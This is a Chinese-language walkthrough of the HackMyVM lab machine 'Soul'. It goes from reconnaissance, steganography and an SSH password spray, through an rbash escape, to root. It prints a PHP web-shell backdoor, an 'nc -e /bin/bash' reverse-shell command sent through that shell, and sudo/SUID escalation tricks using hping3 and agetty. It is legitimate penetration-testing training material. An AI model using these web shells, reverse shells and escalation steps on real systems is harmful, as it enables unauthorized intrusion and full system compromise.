Soul
备注
[Linux VM] [Tested on VirtualBox] created by || sml
⏲️ Release Date // 2020-11-26
✔️ MD5 // 6248b98d48d47575c905dd8fc3361c6d
☠ Root // 49
💀 User // 49
📝Notes // Hack and Fun. Tested on Virtualbox.
靶机启动
靶机 IP
192.168.56.115
nmap 信息搜集
Nmap scan report for 192.168.56.115
Host is up (0.00050s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 8a:e9:c1:c2:a3:44:40:26:6f:22:37:c3:fe:a1:19:f2 (RSA)
| 256 4f:4a:d6:47:1a:87:7e:69:86:7f:5e:11:5c:4f:f1:48 (ECDSA)
|_ 256 46:f4:2c:28:53:ef:4c:2b:70:f8:99:7e:39:64:ec:07 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
web 服务
尝试爆破
[22:07:32] 200 - 24B - /index.html
[22:07:45] 200 - 9B - /robots.txt
查看 /robots.txt 的数据
/nothing
尝试访问 /,是返回一张图片
<img src="saint.jpg">
将图片下载下来进行分析
┌─[randark@parrot]─[~/tmp]
└──╼ $stegseek saint.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "pass.txt".
[i] Extracting to "saint.jpg.out".
┌─[randark@parrot]─[~/tmp]
└──╼ $cat saint.jpg.out
lionsarebigcats
尝试进行密码喷洒攻击
┌─[randark@parrot]─[~]
└──╼ $ hydra -I -v -V -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p lionsarebigcats 192.168.56.115 ssh -t 4
......
[22][ssh] host: 192.168.56.115 login: daniel password: lionsarebigcats
User - daniel
┌─[✗]─[randark@parrot]─[~]
└──╼ $ ssh daniel@192.168.56.115
daniel@192.168.56.115's password:
Linux soul 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Feb 18 09:49:04 2024 from 192.168.56.102
daniel@soul:~$ whoami
daniel
经过探测,这里是受限 shell 环境,即为 rbash
daniel@soul:~$ echo $0
-rbash
web 目录可控
┌─[randark@parrot]─[/usr/share/webshells/php]
└──╼ $ python-server 80
......
drwxr-xr-x 1 root root 64 1 月 22 日 03:13 findsocket
-rw-r--r-- 1 root root 2.8K 2021 年 11 月 21 日 php-backdoor.php
-rwxr-xr-x 1 root root 5.4K 2021 年 11 月 21 日 php-reverse-shell.php
-rw-r--r-- 1 root root 14K 2021 年 11 月 21 日 qsd-php-backdoor.php
-rw-r--r-- 1 root root 328 2021 年 11 月 21 日 simple-backdoor.php
......
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.115 - - [18/Feb/2024 23:30:13] "GET /simple-backdoor.php HTTP/1.1" 200 -
daniel@soul:~$ wget 192.168.56.102/simple-backdoor.php
daniel@soul:~$ mv simple-backdoor.php /var/www/html
文件成功上传,但是并没有被解析
┌─[randark@parrot]─[/usr/share/webshells/php]
└──╼ $ curl 192.168.56.115/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
分析 nginx 配置
查看 nginx 的配置文件
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
# multi_accept on;
}
http {
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
include /etc/nginx/mime.types;
default_type application/octet-stream;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
ssl_prefer_server_ciphers on;
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
gzip on;
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
可以在其中看到
include /etc/nginx/sites-enabled/*
并且并没有开启解析
查看有哪些文件
daniel@soul:~$ ls -lh /etc/nginx/sites-enabled/
total 0
lrwxrwxrwx 1 root root 34 Nov 26 2020 default -> /etc/nginx/sites-available/default
查看 /etc/nginx/sites-enabled/default 的配置数据
server {
listen 80 default_server;
listen [::]:80 default_server;
root /var/www/html;
# Add index.php to the list if you are using PHP
index index.html index.htm index.nginx-debian.html;
server_name _;
location / {
# First attempt to serve request as file, then
# as directory, then fall back to displaying a 404.
try_files $uri $uri/ =404;
}
}
server {
listen 80;
listen [::]:80;
server_name lonelysoul.hmv;
root /var/www/html;
index index.html;
location / {
try_files $uri $uri/ =404;
}
# pass PHP scripts to FastCGI server
#
location ~ \.php$ {
include snippets/fastcgi-php.conf;
#
# # With php-fpm (or other unix sockets):
fastcgi_pass unix:/run/php/php7.3-fpm.sock;
# # With php-cgi (or other tcp sockets):
# fastcgi_pass 127.0.0.1:9000;
}
}
可以看到 lonelysoul.hmv 这个 domain 下的配置里面有 php 解析,加入 hosts 文件之后尝试访问
/etc/hosts
192.168.56.115 lonelysoul.hmv
然后尝试访问
┌─[randark@parrot]─[/usr/share/webshells/php]
└──╼ $ curl lonelysoul.hmv/simple-backdoor.php?cmd=whoami
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<pre>www-data
</pre>
命令被成功执行
User - www-data
# curl lonelysoul.hmv/simple-backdoor.php?cmd=nc+192.168.56.102+9999+-e+/bin/bash
┌─[randark@parrot]─[~]
└──╼ $ pwncat-cs -lp 9999
[10:07:14] Welcome to pwncat 🐈!
[10:07:41] received connection from 192.168.56.115:47562
[10:07:41] 192.168.56.115:47562: registered new host w/ db
(local) pwncat$ back
(remote) www-data@soul:/var/www/html$ whoami
www-data
环境探测
sudo -l
Matching Defaults entries for www-data on soul:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on soul:
(gabriel) NOPASSWD: /tmp/whoami
尝试提权
部署恶意载荷
#!/bin/bash
whoami;
/bin/bash
User - gabriel
(remote) www-data@soul:/tmp$ sudo -u gabriel /tmp/whoami
gabriel
gabriel@soul:/tmp$ whoami
gabriel
flag - user
gabriel@soul:~$ cat user.txt
HMViwazhere
环境探测
sudo -l
Matching Defaults entries for gabriel on soul:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gabriel may run the following commands on soul:
(peter) NOPASSWD: /usr/sbin/hping3
User - peter
gabriel@soul:~$ sudo -u peter /usr/sbin/hping3
hping3> /bin/bash
peter@soul:/home/gabriel$ whoami
peter
环境探测
sudo -l
Permission denied
getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/sbin/hping3 = cap_net_admin,cap_net_raw+eip
find / -perm -u=s -type f 2>/dev/null
/usr/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/sbin/agetty
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
在其中,发现 /usr/sbin/agetty 具有 suid 权限,借此可以实现提权
User - root
peter@soul:~$ /usr/sbin/agetty -o -p -l /bin/bash -a root tty
Debian GNU/Linux 10 soul tty
soul login: root (automatic login)
bash-5.0# whoami
root
flag - root
bash-5.0# cat rootflag.txt
HMVohmygod